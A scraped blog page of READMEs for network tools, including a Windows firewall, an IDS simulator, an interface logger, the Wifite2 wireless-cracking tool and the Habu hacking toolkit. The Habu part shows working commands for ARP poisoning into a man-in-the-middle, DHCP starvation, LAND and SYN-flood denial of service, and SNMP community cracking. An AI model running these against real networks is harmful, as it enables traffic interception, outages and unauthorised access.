Termux ID: Network -->

    Social Items

Home / Network


Simple tool to configure Windows Filtering Platform (WFP) which can configure network activity on your computer.
The lightweight application is less than a megabyte, and it is compatible with Windows Vista and higher operating systems. You can download either the installer or portable version. For correct working, need administrator rights.

Features:
  • Simple interface without annoying pop ups
  • Dropped packets notifications (Windows 7 and above)
  • Proxy support (Windows 8 and above) [BETA]
  • Internal blocklist (block Windows spy / telemetry)
  • Rules editor (create your own rules)
  • Free and open source
  • Localization support
  • IPv6 support
To activate portable mode, create "simplewall.ini" in application folder, or move it from "%APPDATA%\Henry++\simplewall". 


SimpleWall - Simple tool to configure Windows Filtering Platform (WFP)



Network intrusion detection systems simulator. RHAPIS provides a simulation environment through which user is able to execute any IDS operation.

Basic Usage
Type HELP in the console in order to see the available commands. RHAPIS is written in Lua language. You need to have installed Lua in order to run RHAPIS.
The first commands that you must enter in order to install a virtual network intrusion detection system are the following:

SET NETIP1 [ip address], basic address of network in which NIDS is installed (network counters are 1-6).
SET HOSTIP1 [ip address], address of a host inside NIDS (host counters are 1-6).
INCLUDE config, loads a random configuration file
INCLUDE ruleset, reads a set of rules that will be identified by the intrusion detection system
Now you have activated detectability.
SET ATTHOSTIP1 [ip address]. With the current command you set an attacker's identity. In this way, you will be able to make virtual attacks on random destinations by using the command ATTACK afterwards.

Host counters are again 1-6.
In order your attacks to be recognized by the intrusion detection system, you need to attack hosts that are part of the established network intrusion detection system.
For example:
SET HOSTIP1 7.7.7.7
ATTACK XSS 7.7.7.7
ATTACK XSS 9.9.9.9
DETECT XSS
In the above commands, the attack which will only be identified by NIDS will be that on destination address 7.7.7.7 because this is an active host of the network in which NIDS is installed.

On the other hand, the attack on 9.9.9.9 will not be detected.

Simulator Commands
ATTACK [type of attack] [destination IP address] = DOS,XSS,RFI,SQL,SHELL,REMBUFF,MALWARE,BRUTE,ARP,CSRF,MASQUERADE,PROBE,HIJACK
REPEAT [type of attack] = DOS,SHELL,REMBUFF,CSRF,SQL,XSS,ARP,RFI
GENERATE [type of traffic] [number of packets] = IN,OUT,MAL
SEND [type of packets] [number of packets] [destination IP address] = ACK,TCP,RST,FIN,MALF,UDP,SYN
INCLUDE ruleset,config
SET [network/hosts] [IP address] = NETIP1,NETIP2,NETIP3,NETIP4,NETIP5,HOSTIP1,HOSTIP2,HOSTIP3,HOSTIP4,HOSTIP5,HOSTIP6,ATTHOSTIP1,ATTHOSTIP2,ATTHOSTIP3,ATTHOSTIP4,ATTHOSTIP5,ATTHOSTIP6,ATTNETIP1,ATTNETIP2,ATTNETIP3,ATTNETIP4,ATTNETIP4,ATTNETIP5
HIDE/UNHIDE [undetectability] = MIX,DC
ATTEMPT [type of attack] [destination IP address] = DOS,XSS,LDAP,XPATH,SHELL
DETECT [type of attack] = DOS,XSS,RFI,SQL,SHELL,REMBUFF,MALWARE,BRUTE,ARP,CSRF,MASQUERADE,PROBE,HIJACK
ANALYZE [type of data] = HEX/FRAMES
The rest possible commands to be used are:
ALARMS, VISUALIZE, DATASET, INTRUDERS, HELP, INFO, ANONYMIZE

Examples
ATTACK DOS 7.7.7.7
ATTACK SHELL 2.2.2.2
GENERATE IN 660
DETECT SHELL
GENERATE MAL 1500
ATTACK MALWARE 5.5.5.5
DATASET
ATTEMPT XSS 10.10.10.10
Inside the main directory you can find log files for every kind of information you enter on RHAPIS console (datasets, alarms, configuration, intruders, etc).


RHAPIS - Network Intrusion Detection Systems Simulator


NIELD (Network Interface Events Logging Daemon) is a tool to receive notifications from kernel through netlink socket, and generate logs related to interfaces, neighbor cache (ARP,NDP), IP address (IPv4,IPv6), routing, FIB rules, traffic control.

Download 
$ git clone https://github.com/t2mune/nield.git

Install
$ ./configure
$ make
# make install

Usage
nield [-vh46inarft] [-p lock_file] [-s buffer_size] [-l log_file] [-L syslog_facility] [-d debug_file]

Options
Standard options:

    -v     Displays the version and exit.

    -h     Displays the usage and exit.

    -p lock_file
           Specifies the lock file to use. Default is "/var/run/nield.pid", if not specified.

    -s buffer_size
           Specifies the maximum socket receive buffer in bytes.

Logging options:
    It uses the log file "/var/log/nield.log", if neither "-l" nor "-L" specified.

    -l log_file
           Specifies the log file to use.

    -L syslog_facility
           Specifies the facility to use logging events via syslog.

           The standard syslog facilities are as follows:
               auth, authpriv, cron, daemon, ftp, kern, lpr, mail, mark, news, security, syslog,
               user, uucp, local0, local1, local2, local3, local4, local5, local6, local7

    -d debug_file
           Specifies the debug file to use.

Event options:
    All events are received, if any event option not specified.

    -4     Logging events related to IPv4.

    -6     Logging events related to IPv6.

    -i     Logging events related to interfaces.

    -n     Logging events related to neigbour cache(ARP, NDP).

    -a     Logging events related to IP address.

    -r     Logging events related to routing.

    -f     Logging events related to fib rules.

    -t     Logging events related to traffic control.

Files /usr/sbin/nield /var/run/nield.pid /var/log/nield.log /usr/share/man/man8/nield.8

Examples 
Interface When an interface was disabled by command:
[2013-08-07 04:27:31.537101] interface eth0 state changed to disabled
When an interface has gone down:
[2013-08-07 04:27:31.537125] interface eth0 state changed to down
When an interface was enabled by command:
[2013-08-07 04:27:37.639079] interface eth0 state changed to enabled
When an interface has come up:
[2013-08-07 04:27:40.267577] interface eth0 state changed to up
When link layer address of an interface changed:
[2013-08-07 04:27:43.645661] interface eth0 link layer address changed from f6:af:fc:41:9e:7d to be:ee:bd:3d:22:68
When mtu of an interface changed:
[2013-08-07 04:27:49.775200] interface eth0 mtu changed from 1500 to 1400
When a vlan interface was added:
[2013-08-07 04:27:55.904868] interface added: name=eth0.100 link=eth0 lladdr=f6:af:fc:41:9e:7d mtu=1500 kind=vlan vid=100 state=disabled,linkdown
When a vlan interface was deleted:
[2013-08-07 04:28:13.924831] interface deleted: name=eth0.100 link=eth0 lladdr=f6:af:fc:41:9e:7d mtu=1500 kind=vlan vid=100 state=disabled,linkdown
When a vxlan interface was added:
[2013-08-07 06:30:08.938025] interface added: name=vxlan0 lladdr=9e:c5:83:a8:ea:00 mtu=1500 kind=vxlan vnid=100 local=192.168.1.100 group=224.0.0.100 state=disabled,linkdown
When a vxlan interface was deleted:
[2013-08-07 06:30:27.378033] interface deleted: name=vxlan0 lladdr=9e:c5:83:a8:ea:00 mtu=1500 kind=vxlan vnid=100 local=192.168.1.100 group=224.0.0.100 state=disabled,linkdown
When a bridge interface was added:
[2013-08-07 04:28:19.938136] interface added: name=br0 lladdr=f2:60:df:71:d0:ae mtu=1500 kind=bridge state=disabled,linkdown
When a tap interface was added:
[2013-08-07 04:28:31.951485] interface added: name=tap0 lladdr=52:4e:47:b3:e2:00 mtu=1500 kind=tun state=disabled,linkdown
When a tap interface was attached to an ethernet bridge:
[2013-08-07 04:28:37.958396] interface tap0 attached to bridge br0
When a tap interface was detached to an ethernet bridge:
[2013-08-07 04:28:55.977159] interface tap0 detached from bridge br0
When a tap interface was deleted:
[2013-08-07 04:29:01.983806] interface deleted: name=tap0 lladdr=52:4e:47:b3:e2:00 mtu=1500 kind=tun state=disabled,linkdown
When a bridge interface was deleted:
[2013-08-07 04:29:14.006774] interface deleted: name=br0 lladdr=00:00:00:00:00:00 mtu=1500 kind=bridge state=disabled,linkdown
When a bonding interface was added:
[2013-08-07 04:29:20.027673] interface added: name=bond0 lladdr=00:00:00:00:00:00 mtu=1500 kind=bond state=disabled,linkdown
When an interface was attached to a bonding interface:
[2013-08-07 04:29:32.085061] interface eth0 attached to bonding bond0
When an interface was detached to a bonding interface:
[2013-08-07 04:30:09.101576] interface eth0 detached from bonding bond0
When a bonding interface was deleted:
[2013-08-07 04:30:27.644523] interface deleted: name=bond0 lladdr=00:00:00:00:00:00 mtu=1500 kind=bond state=disabled,linkdown
When a gre interface was added:
[2013-08-07 04:30:33.678351] interface added: name=gre0 local=192.168.1.100 remote=192.168.2.100 mtu=1476 kind=gre state=disabled,linkdown
When a gre interface was deleted:
[2013-08-07 04:30:51.698009] interface deleted: name=gre0 local=192.168.1.100 remote=192.168.2.100 mtu=1476 kind=gre state=disabled,linkdown
When a gretap interface was added:
[2013-08-07 04:30:57.716615] interface added: name=gretap0 lladdr=a2:52:ec:ec:78:60 mtu=1462 kind=gretap local=192.168.1.100 remote=192.168.2.100 state=disabled,linkdown
When a gretap interface was deleted:
[2013-08-07 04:31:15.736468] interface deleted: name=gretap0 lladdr=a2:52:ec:ec:78:60 mtu=1462 kind=gretap local=192.168.1.100 remote=192.168.2.100 state=disabled,linkdown
When an IPv4 tunnel interface(ipip,sit,isatap) was added:
[2013-08-07 04:31:21.755082] interface added: name=iptnl0 local=192.168.1.100 remote=192.168.2.100 mtu=1480 state=disabled,linkdown
When an IPv4 tunnel interface(ipip,sit,isatap) was deleted:
[2013-08-07 04:31:39.774847] interface deleted: name=iptnl0 local=192.168.1.100 remote=192.168.2.100 mtu=1480 kind=ipip state=disabled,linkdown
When an IPv6 tunnel interface(ip6ip6,ipip6) was added:
[2013-08-07 04:32:58.112423] interface added: name=ip6tnl0 local=2001:db8:10::1 remote=2001:db8:20::1 mtu=1452 state=disabled,linkdown
When an IPv6 tunnel interface(ip6ip6,ipip6) was deleted:
[2013-08-07 04:33:16.132706] interface deleted: name=ip6tnl0 local=2001:db8:10::1 remote=2001:db8:20::1 mtu=1452 kind=ip6tnl state=disabled,linkdown

IPv4 ARP When an ARP cache entry was created:
[2013-08-07 04:33:28.157183] arp cache added: ip=192.168.1.2 mac=00:1b:8b:84:36:dc interface=eth0
When an ARP cache entry has expired:
[2013-08-07 06:11:14.516780] arp cache deleted: ip=192.168.1.2 mac=00:1b:8b:84:36:dc interface=eth0
When an ARP cache entry was cleared by command:
[2013-08-07 04:33:34.164063] arp cache invalidated: ip=192.168.1.2 mac=00:00:00:00:00:00 interface=eth0
When an ARP cache entry was unresolved:
[2013-08-07 06:10:06.204374] arp cache unresolved: ip=192.168.1.2 mac=00:00:00:00:00:00 interface=eth0
When link layer address of an entry in the ARP cache table has changed:
[2013-08-07 06:17:50.355827] arp cache changed: ip=192.168.1.2 mac=00:1b:8b:84:36:dc interface=eth0

IPv6 NDP When a NDP cache entry was created:
[2013-08-07 04:34:28.221875] ndp cache added: ip=2001:db8::2 mac=00:1b:8b:84:36:dc interface=eth0
When a NDP cache entry has expired:
[2013-08-07 06:20:00.084350] ndp cache deleted: ip=2001:db8::2 mac=00:1b:8b:84:36:dc interface=eth0
When a NDP cache entry was cleared by command:
[2013-08-07 04:34:34.229066] ndp cache invalidated: ip=2001:db8::2 mac=00:00:00:00:00:00 interface=eth0
When a NDP cache entry was unresolved:
[2013-08-07 04:34:34.229066] ndp cache unresolved: ip=2001:db8::2 mac=00:00:00:00:00:00 interface=eth0
When link layer address of an entry in the NDP cache table has changed:
[2013-08-07 06:21:57.396102] ndp cache changed: ip=2001:db8::2 mac=00:1b:8b:84:36:dc interface=eth0

IPv4 Address When an IPv4 address was assigned:
[2013-08-07 04:33:22.150078] ipv4 address added: interface=eth0 ip=192.168.1.1/24 socpe=global
When an IPv4 address was removed:
[2013-08-07 04:34:04.195166] ipv4 address deleted: interface=eth0 ip=192.168.1.1/24 socpe=global

IPv6 Address When an IPv6 address was assigned:
[2013-08-07 04:34:23.810337] ipv6 address added: interface=eth0 ip=2001:db8::1/64 socpe=global
When an IPv6 address was removed:
[2013-08-07 04:35:04.262540] ipv6 address deleted: interface=eth0 ip=2001:db8::1/64 socpe=global

IPv4 Route
When an IPv4 route was added:
[2013-08-07 04:33:40.170235] ipv4 route added: destination=172.16.1.0/24 nexthop=192.168.1.2 interface=eth0 type=unicast protocol=boot table=main
When an IPv4 route was removed:
[2013-08-07 04:33:46.176411] ipv4 route deleted: destination=172.16.1.0/24 nexthop=192.168.1.2 interface=eth0 type=unicast proto=boot table=main

IPv6 Route When an IPv6 route was added:
[2013-08-07 04:34:40.235651] ipv6 route added: destination=2001:db8:1::/64 nexthop=2001:db8::2 interface=eth0 metric=1024 type=unicast protocol=boot table=main
When an IPv6 route was removed:
[2013-08-07 04:34:46.242398] ipv6 route deleted: destination=2001:db8:1::/64 nexthop=2001:db8::2 interface=eth0 metric=1024 type=unicast proto=boot table=main

IPv4 FIB Rule When an IPv4 rule was added:
[2013-08-07 04:35:22.281834] ipv4 rule added: from=192.168.1.0/24 table=unknown priority=32765 action=to_tbl
When an IPv4 rule was deleted:
[2013-08-07 04:35:28.288220] ipv4 rule deleted: from=192.168.1.0/24 table=unknown priority=32765 action=to_tbl

IPv6 FIB Rule
When an IPv6 rule was added:
[2013-08-07 04:35:34.294521] ipv6 rule added: from=2001:db8:1::/64 table=unknown priority=16383 action=to_tbl
When an IPv6 rule was deleted:
[2013-08-07 04:35:40.300824] ipv6 rule deleted: from=2001:db8:1::/64 table=unknown priority=16383 action=to_tbl

Traffic Control When a qdisc was added:
[2013-08-07 04:37:46.502234] tc qdisc added: interface=eth0 parent=root classid=1: qdisc=htb rate2quantum=10 default-class=0x12
When a qdisc was deleted:
[2013-08-07 04:37:52.516665] tc qdisc deleted: interface=eth0 parent=root classid=1: qdisc=htb rate2quantum=10 default-class=0x12
When a class was added:
[2013-08-07 04:37:46.503530] tc class added: interface=eth0 parent=root classid=1:1 qdisc=htb rate=800.000(kbit/s) burst=1.562(Kbyte) ceil=1.600(Mbit/s) cburst=3.125(Kbyte) level=0 prio=0
When a class was deleted:
[2013-08-07 04:37:52.515528] tc class deleted: interface=eth0 parent=root classid=1:1 qdisc=htb rate=800.000(kbit/s) burst=1.562(Kbyte) ceil=1.600(Mbit/s) cburst=3.125(Kbyte) level=0 prio=0
When a filter was added:
[2013-08-07 04:40:28.814964] tc filter added: interface=eth0 handle=801::800 priority=10 protocol=ip filter=u32 classid=1:2 hash(table/bucket)=0x801/0x0
[2013-08-07 04:40:28.814990] tc filter added: interface=eth0 handle=801::800 priority=10 protocol=ip filter=u32 flags=terminal offshift=0 nkeys=2 offmask=0x0000 off=0 offoff=0 hoff=0 hmask=0x00000000
[2013-08-07 04:40:28.815007] tc filter added: interface=eth0 handle=801::800 priority=10 protocol=ip filter=u32 key=1 value=0xc0a86404 mask=0xffffffff offset=16 offmask=0x00000000
[2013-08-07 04:40:28.815020] tc filter added: interface=eth0 handle=801::800 priority=10 protocol=ip filter=u32 key=2 value=0xc0a86403 mask=0xffffffff offset=12 offmask=0x00000000
[2013-08-07 04:40:28.815099] tc filter added: interface=eth0 handle=801::800 priority=10 protocol=ip filter=u32 order=1 action=police index=1 rate=1.000(Mbit/s) burst=128.000(Kbyte) latency=0.000(us) exceed=drop
When a filter was deleted:
[2013-08-07 04:40:34.830414] tc filter deleted: interface=eth0 handle=:: priority=10 protocol=ip filter=u32
When an action was added:
[2013-08-07 04:40:10.769257] tc action added: order=1 action=nat index=20 from=192.168.1.0/24 to=192.168.2.1 direction=ingress


NIELD v0.6.1 - Network Interface Events Logging Daemon

A complete re-write of wifite, a Python script for auditing wireless networks.

What's new?
  • Lots of files instead of "one big script".
  • Cleaner process management -- No longer leaves processes running in the background.
  • UX: Target access points are refreshed every second instead of every 5 seconds.
  • UX: Displays realtime Power level (in db) of currently-attacked target

What's not new?
  • Backwards compatibility with the original wifite's arguments.
  • Same text-based interface everyone knows and loves.

Full Feature List
  • Reaver Pixie-Dust attack (--pixie)
  • Reaver WPS PIN attack (--reaver)
  • WPA handshake capture (--no-reaver)
  • Validates handshakes against pyrit, tshark, cowpatty, and aircrack-ng
  • Various WEP attacks (replay, chopchop, fragment, etc)
  • 5Ghz support for wireless cards that support 5ghz (use -5 option)
  • Stores cracked passwords and handshakes to the current directory, with metadata about the access point (via --cracked command).
  • Decloaks hidden access points when channel is fixed (use -c <channel> option)
  • Provides commands to crack captured WPA handshakes (via --crack command)

Support
Wifite2 is designed entirely for the latest version of Kali Rolling release (tested on Kali 2016.2, updated May 2017).
This means only the latest versions of these programs are supported: Aircrack-ng suite, wash, reaver, tshark, cowpatty.
Other pen-testing distributions (such as BackBox) have outdated versions of these suites; these distributions are not supported.

Installing & Running
git clone https://github.com/derv82/wifite2.git
cd wifite2
./Wifite.py

Screenshots

Decloaking & cracking a hidden access point (via the WPA Handshake attack):


Cracking a weak WEP password (using the WEP Replay attack):


Various cracking options (using --crack option):



Wifite 2 - A complete re-write of Wifite (Automated Wireless Attack Tool)


Habu is to teach (and learn) some concepts about Python and Network Hacking.
These are basic functions that help with some tasks for Ethical Hacking and Penetration Testing.
Most of them are related with networking, and the implementations are intended to be understandable for who wants to read the source code and learn from that.

Some techniques implemented in the current version are:
  • ARP Poisoning
  • ARP Sniffing
  • DHCP Discover
  • DHCP Starvation
  • LAND Attack
  • SNMP Cracking
  • SYN Flooding
  • TCP Flags Analysis
  • TCP ISN Analysis
  • TCP Port Scan


Installation
To install Habu, simply:
$ pip3 install habu


Dependencies
Habu requires:
  • Click
  • Python (3.x),
  • Scapy-Python3
  • Matplotlib (Optional, only needed if you want to make some graphs)


Get Help
All the commands implement the option '--help', that shows the help, arguments, options, and default values.


Verbose Mode
Almost all commands implement the verbose mode with the '-v' option. This can give you some extra info about what habu is doing.


habu.arpoison: ARP Poisoning
This command sends ARP 'is-at' packets to each victim, poisoning their ARP tables for send the traffic to your system.
$ sudo habu.arpoison 192.168.1.5 192.168.1.6
Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.6
Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.5
Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.6
Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.5
...
Note: If you want a full working Man In The Middle attack, you need to enable the packet forwarding on your operating system to act like a router. You can do that using:
echo 1 > /proc/sys/net/ipv4/ip_forward


habu.arpsniff: Discover devices on your LAN capturing ARP packets
This command listen for ARP packets and shows information each device.
Columns: Seconds from last packet | IP | MAC | Vendor
1   192.168.0.1         a4:08:f5:19:17:a4   Sagemcom Broadband SAS
7   192.168.0.2         64:bc:0c:33:e5:57   LG Electronics (Mobile Communications)
2   192.168.0.5         00:c2:c6:30:2c:58   Intel Corporate
6   192.168.0.7         54:f2:01:db:35:58   Samsung Electronics Co.,Ltd


habu.contest: Check your connection capabilities
This command tries to connect to various services and check if you can reach them using your internet connection.
$ habu.contest
IP:    True
DNS:   True
FTP:   True
SSH:   True
HTTP:  True
HTTPS: True


habu.dhcp_discover: Discover DHCP servers
This command send a DHCP request and shows what devices has replied. Using the '-v' parameter (verbose) you can see all the options (like DNS servers) included on the responses.
$ sudo habu.dhcp_discover
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.5:bootpc / BOOTP / DHCP


habu.dhcp_starvation: Fill the DHCP leases
This command send multiple DHCP requests from forged MAC addresses to fill the DHCP server leases. When all the available network addresses are assigned, the DHCP server don't send responses. So, some attacks, like DHCP spoofing can be made.
$ sudo habu.dhcp_starvation
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.6:bootpc / BOOTP / DHCP
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.7:bootpc / BOOTP / DHCP
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.8:bootpc / BOOTP / DHCP


habu.eicar: Prints the EICAR test string
This command prints the EICAR test string that can be used to test antimalware engines. More info: http://www.eicar.org/86-0-Intended-use.html
$ habu.eicar
X5O!P%@AP[4\XZP54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Note: The below string is incorrect because is not a good idea write the complete in this text file. Some antivirus program can be detect it like a virus. :)


habu.hasher: Computes various hashes with the input data
This command computes various hashes for the input data, that can be a file or a stream.
If the filename is '-', the data is taken from the standard input (stdin) so, three different variants exists to call this command:
$ habu.hasher README.rst
md5  : 375375d9cfb2aacab7c8d1a9afd3d9b7
sha1 : 21c67b9ef44bc24d47eef6adab648ba34662927e

$ cat README.rst | habu.hasher -
md5  : 375375d9cfb2aacab7c8d1a9afd3d9b7
sha1 : 21c67b9ef44bc24d47eef6adab648ba34662927e

$ habu.hasher - < README.rst
md5  : 375375d9cfb2aacab7c8d1a9afd3d9b7
sha1 : 21c67b9ef44bc24d47eef6adab648ba34662927e
Note: The output above shows only MD5 and SHA1 to make it short, but the real output includes more algorithms.
You can also specify which algorithm to use. In such case, the output is only the value of the calculated hash:
$ habu.hasher -a md5 README.rst
375375d9cfb2aacab7c8d1a9afd3d9b7


habu.ip: Prints your current public IP
This command prints your current public IP based on the response from https://api.ipify.org.
$ habu.ip
182.26.32.246


habu.isn: Prints the TCP sequence numbers for an IP
This command creates TCP connections and prints the TCP initial sequence numbers for each connections.
$ sudo habu.isn www.portantier.com
1962287220
1800895007
589617930
3393793979
469428558
You can get a graphical representation (needs the matplotlib package) using the '-g' option:
$ sudo habu.isn -g -c 10 www.portantier.com
Note: The above command uses '-c' option to define that 10 connections must be created.


habu.land: Implements the LAND attack
This command implements the LAND attack, that sends packets forging the source IP address to be the same that the destination IP. Also uses the same source and destination port.
The attack is very old, and can be used to make a Denial of Service on old systems, like Windows NT 4.0. More information here: https://en.wikipedia.org/wiki/LAND
sudo habu.land 172.16.0.10
............
Note: Each dot (.) is a sent packet. You can specify how many packets send with the '-c' option. The default is never stop. Also, you can specify the destination port, with the '-p' option.


habu.ping: ICMP echo requests
This command implements the classic 'ping' with ICMP echo requests.
$ sudo habu.ping 8.8.8.8
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding


habu.snmp_crack: SNMP Community Cracker
This command launches snmp-get queries against an IP, and tells you when finds a valid community string (is a simple SNMP cracker).
The dictionary used is the distributed with the onesixtyone tool (https://github.com/trailofbits/onesixtyone)
$ sudo habu.snmp_crack 179.125.234.210
Community found: private
Community found: public
Note: You can also receive messages like <UNIVERSAL> <class 'scapy.asn1.asn1.ASN1_Class_metaclass'>, I don't know how to supress them for now.


habu.synflood: SYN Flood Attack Implementation
This command launches a lot of TCP connections and keeps them opened. Some very old systems can suffer a Denial of Service with this. More info: https://en.wikipedia.org/wiki/SYN_flood
$ sudo habu.synflood 172.16.0.10
.................
Each dot is a packet sent.
You can use the options '-2' and '-3' to forge the layer 2/3 addresses. If you use them, each connection will be sent from a random layer2 (MAC) and/or layer3 (IP) address.
You can choose the number of connections to create with the option '-c'. The default is never stop creating connections.
Note: If you send the packets from your real IP address and you want to keep the connections half-open, you need to setup for firewall to don't send the RST packets. With habu, you can do this with the following command (only works with Linux+IPTables):
$ sudo habu.firewall --no-rst
You can check the results with "iptables -L -n", and you will see something like this:
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0            tcp flags:0x04/0x04


habu.tcpflags: TCP Flag Fuzzer
This command send TCP packets with different flags and tell you what responses receives.
It can be used to analyze how the different TCP/IP stack implementations and configurations responds to packet with various flag combinations.
$ sudo habu.tcpflags www.portantier.com
S  -> SA
FS -> SA
FA -> R
SA -> R
By default, the command sends all possible flag combinations. You can specify with flags must ever be present (reducing the quantity of possible combinations), with the option '-f'.
Also, you can specify which flags you want to be present on the response packets to show, with the option '-r'.
With the next command, you see all the possible combinations that have the FIN (F) flag set and generates a response that contains the RST (R) flag.
$ sudo habu.tcpflags -f F -r R www.portantier.com
FPA  -> R
FSPA -> R
FAU  -> R


habu - Network Hacking Toolkit

Subscribe to: Posts (Atom)